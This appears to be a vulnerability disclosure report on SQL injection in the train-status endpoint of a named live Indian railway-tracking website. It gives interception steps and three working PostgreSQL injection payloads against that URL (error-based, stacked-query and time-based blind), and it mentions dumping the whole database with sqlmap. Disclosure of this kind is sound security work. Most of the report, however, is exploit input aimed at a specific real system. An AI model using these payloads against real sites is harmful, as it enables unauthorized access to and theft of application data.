Summary: PostgreSQL- Error based & Time based & Stacked Queries
Steps to reproduce:
Go to url
https://whereismytrain.in/mt/change_in_status
Send a normal request on a proxy with train number and date, Intercept and inject your
Date
it would throw an error
Leading to an injection
For your assistance the injection type ==> injection title ==> injection payload
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: train_no=12424&train_date=22-10-2019' AND 7869=CAST((CHR(113)||CHR(107)||CHR(112)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (7869=7869) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND 'WfdB'='WfdB
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: train_no=12424&train_date=22-10-2019';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: train_no=12424&train_date=22-10-2019' AND 2413=(SELECT 2413 FROM PG_SLEEP(5)) AND 'KKpT'='KKpT
Browser/OS: Chromium/Firefox
Attack scenario:
A mere visitor to this application with an intention to damage the repo will enter the upgiven link capture the parameter and escalate it to making it a potential injection.
They gain the application's data as well as the application's code in some results. Even I am getting hard time to understand how come "python" is passing through the threads in the exploitation framework when you command --dump-all (SQLMap)
Acquisition info:
Crunchbase